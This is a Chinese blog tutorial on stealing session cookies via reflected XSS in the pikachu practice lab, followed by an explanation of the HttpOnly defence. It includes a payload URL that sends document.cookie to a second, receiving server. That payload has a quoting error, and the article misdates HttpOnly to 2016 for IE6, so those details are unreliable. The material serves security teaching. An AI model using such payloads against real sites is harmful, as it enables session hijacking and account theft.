XSS漏洞利用之cookie获取

目录

环境搭建

盗取cookie

httponly


刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。

环境搭建

  • 存在漏洞的网站:pikachu靶场
  • 接收cookie的网站:pikachu靶场中的管理工具xss后台

可以在两个服务器上同时开启pikachu靶场,一个测试漏洞,一个接收cookie

1. 修改pikachu-master\pkxss\xcookie\cookie.php文件

设置获取cookie后重定向的网站地址,这里就直接跳转到pikachu靶场的

2. 登录管理工具xss后台

盗取cookie

1. 测试是否能获取到cookie

如下我们可以知道当前页面是存在cookie的,通过document.cookie成功获取到了

 2. 盗取cookie

因为页面存在xss漏洞,可以进行弹窗操作,既然能弹窗说明能执行js语句,那么在特定条件我们通过执行js语句可以获取cookie值。

受害者在未退出登录的情况下不小心点击了恶意链接,如下

192.168.189.129/2_Shotting_Range/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>document.location = http://192.168.189.128/2_Shotting_Range/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit

红色字体就是存在xss漏洞的位置,我们在这里放入获取cookie的payload。payload意思就是访问189.128页面并且携带cookie将cookie存储到指定页面中

然后点击访问,页面进行了跳转,跳转到hacker的服务器上

2. 查看是否获取到cookie

如下成功获取到信息

httponly

HttpOnly是2016年微软为IE6而新增了这一属性,HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险。

也就是说HttpOnly存在主要是为了防止用户通过前端js来盗用cookie而产生的风险,例如XSS攻击就是对cookie进行盗窃,使用这一属性就可以防止通过js脚本读取到cookie信息,预防XSS攻击,窃取cookie内容

如下,在set-cookie没有设置httponly的情况下,通过document.cookie是可以获取到cookie值的

 然后设置httponly

 正确登录后,返回含有httponly的cookie值

 然后再通过document.cookie,此时则获取不到cookie值了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vibe~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值